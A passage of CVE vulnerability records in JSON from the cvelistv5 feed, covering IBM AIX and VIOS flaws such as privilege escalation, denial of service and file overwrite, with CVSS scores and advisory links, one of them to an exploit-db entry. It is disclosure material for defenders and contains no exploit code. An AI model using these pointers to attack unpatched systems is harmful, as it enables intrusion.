"name": "ibm-aix-cve202129861-info-disc (206085)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206085" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29861", "datePublished": "2021-11-17T14:00:16.343676Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-16T22:35:23.461Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2013-3005
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://aix.software.ibm.com/aix/efixes/security/tftp_advisory.asc | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/85366 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42935 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42934 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV40221 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42932 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42933 | vendor-advisory, x_refsource_AIXAPAR | |
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19519 | vdb-entry, signature, x_refsource_OVAL | |
http://www.ibm.com/support/docview.wss?uid=isg1IV42700 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T15:52:21.679Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/tftp_advisory.asc" }, { "name": "aix-cve20133005-file-overwrite(85366)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85366" }, { "name": "IV42935", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42935" }, { "name": "IV42934", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42934" }, { "name": "IV40221", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV40221" }, { "name": "IV42932", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42932" }, { "name": "IV42933", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42933" }, { "name": "oval:org.mitre.oval:def:19519", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19519" }, { "name": "IV42700", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42700" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The TFTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, when RBAC is enabled, allows remote authenticated users to bypass intended file-ownership restrictions, and read or overwrite arbitrary files, via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/tftp_advisory.asc" }, { "name": "aix-cve20133005-file-overwrite(85366)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85366" }, { "name": "IV42935", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42935" }, { "name": "IV42934", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42934" }, { "name": "IV40221", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV40221" }, { "name": "IV42932", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42932" }, { "name": "IV42933", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42933" }, { "name": "oval:org.mitre.oval:def:19519", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19519" }, { "name": "IV42700", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42700" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2013-3005", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The TFTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, when RBAC is enabled, allows remote authenticated users to bypass intended file-ownership restrictions, and read or overwrite arbitrary files, via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://aix.software.ibm.com/aix/efixes/security/tftp_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/tftp_advisory.asc" }, { "name": "aix-cve20133005-file-overwrite(85366)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85366" }, { "name": "IV42935", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42935" }, { "name": "IV42934", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42934" }, { "name": "IV40221", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV40221" }, { "name": "IV42932", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42932" }, { "name": "IV42933", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42933" }, { "name": "oval:org.mitre.oval:def:19519", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19519" }, { "name": "IV42700", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV42700" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2013-3005", "datePublished": "2013-07-06T10:00:00", "dateReserved": "2013-04-12T00:00:00", "dateUpdated": "2024-08-06T15:52:21.679Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43848
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/239169 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:40:06.410Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/239169" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. IBM X-Force ID: 239169." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. IBM X-Force ID: 239169." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T19:06:02.504Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/239169" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43848", "datePublished": "2022-12-23T19:06:02.504Z", "dateReserved": "2022-10-26T15:46:22.821Z", "dateUpdated": "2024-08-03T13:40:06.410Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-8904
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://secunia.com/advisories/62195 | third-party-advisory, x_refsource_SECUNIA | |
http://www.securitytracker.com/id/1031596 | vdb-entry, x_refsource_SECTRACK | |
http://aix.software.ibm.com/aix/efixes/security/lvm_advisory.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV67907 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV68070 | vendor-advisory, x_refsource_AIXAPAR | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/99193 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV68082 | vendor-advisory, x_refsource_AIXAPAR | |
https://www.exploit-db.com/exploits/38576/ | exploit, x_refsource_EXPLOIT-DB | |
http://www.ibm.com/support/docview.wss?uid=isg1IV68478 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV67908 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T13:33:12.661Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "62195", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/62195" }, { "name": "1031596", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031596" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/lvm_advisory.asc" }, { "name": "IV67907", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67907" }, { "name": "IV68070", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68070" }, { "name": "ibm-aix-cve20148904-sec-bypass(99193)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99193" }, { "name": "IV68082", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68082" }, { "name": "38576", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/38576/" }, { "name": "IV68478", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68478" }, { "name": "IV67908", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67908" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2015-01-13T00:00:00", "descriptions": [ { "lang": "en", "value": "lquerylv in cmdlvm in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x allows local users to gain privileges via a crafted DBGCMD_LQUERYLV environment-variable value." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-07T15:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "62195", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/62195" }, { "name": "1031596", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1031596" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/lvm_advisory.asc" }, { "name": "IV67907", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67907" }, { "name": "IV68070", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68070" }, { "name": "ibm-aix-cve20148904-sec-bypass(99193)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99193" }, { "name": "IV68082", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68082" }, { "name": "38576", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/38576/" }, { "name": "IV68478", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68478" }, { "name": "IV67908", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67908" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2014-8904", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "lquerylv in cmdlvm in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.x allows local users to gain privileges via a crafted DBGCMD_LQUERYLV environment-variable value." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "62195", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/62195" }, { "name": "1031596", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1031596" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/lvm_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/lvm_advisory.asc" }, { "name": "IV67907", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67907" }, { "name": "IV68070", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68070" }, { "name": "ibm-aix-cve20148904-sec-bypass(99193)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99193" }, { "name": "IV68082", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68082" }, { "name": "38576", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/38576/" }, { "name": "IV68478", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV68478" }, { "name": "IV67908", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV67908" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2014-8904", "datePublished": "2015-01-15T22:00:00", "dateReserved": "2014-11-14T00:00:00", "dateUpdated": "2024-08-06T13:33:12.661Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45166
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7095022 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267964 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.981Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267964" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "264 Permissions, Privileges, Access Controls", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-13T23:01:25.905Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7095022" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267964" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX privilege escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45166", "datePublished": "2023-12-13T23:01:25.905Z", "dateReserved": "2023-10-05T01:38:44.721Z", "dateUpdated": "2024-08-02T20:14:19.981Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-47990
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6855827 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/243556 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:02:36.652Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6855827" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/243556" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(204, 217, 226);\"\u003eIBM AIX 7.1, 7.2, 7.3 and VIOS , 3.1 could allow a non-privileged local user to exploit a vulnerability in X11 to cause a buffer overflow that could result in a denial of service or arbitrary code execution. IBM X-Force ID: 243556.\u003c/span\u003e\n\n\u2003" } ], "value": "\nIBM AIX 7.1, 7.2, 7.3 and VIOS , 3.1 could allow a non-privileged local user to exploit a vulnerability in X11 to cause a buffer overflow that could result in a denial of service or arbitrary code execution. IBM X-Force ID: 243556.\n\n\u2003" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-120", "description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-18T18:19:12.270Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6855827" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/243556" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-47990", "datePublished": "2023-01-18T18:19:12.270Z", "dateReserved": "2022-12-28T17:49:58.384Z", "dateUpdated": "2024-08-03T15:02:36.652Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45169
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7105282 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267967 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.732Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267967" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the pmsvcs kernel extension to cause a denial of service. IBM X-Force ID: 267967." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the pmsvcs kernel extension to cause a denial of service. IBM X-Force ID: 267967." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T02:03:17.669Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267967" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45169", "datePublished": "2024-01-11T02:03:17.669Z", "dateReserved": "2023-10-05T01:38:44.722Z", "dateUpdated": "2024-08-02T20:14:19.732Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41290
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847917 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/236690 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:42:44.067Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847917" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/236690" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the rm_rlcache_file command to obtain root privileges. IBM X-Force ID: 236690." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the rm_rlcache_file command to obtain root privileges. IBM X-Force ID: 236690." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-250", "description": "CWE-250 Execution with Unnecessary Privileges", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T19:32:42.839Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847917" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/236690" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX privilege escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-41290", "datePublished": "2022-12-23T19:32:42.839Z", "dateReserved": "2022-09-21T17:43:55.393Z", "dateUpdated": "2024-08-03T12:42:44.067Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-26286
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6983236 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/248421 | vdb-entry |
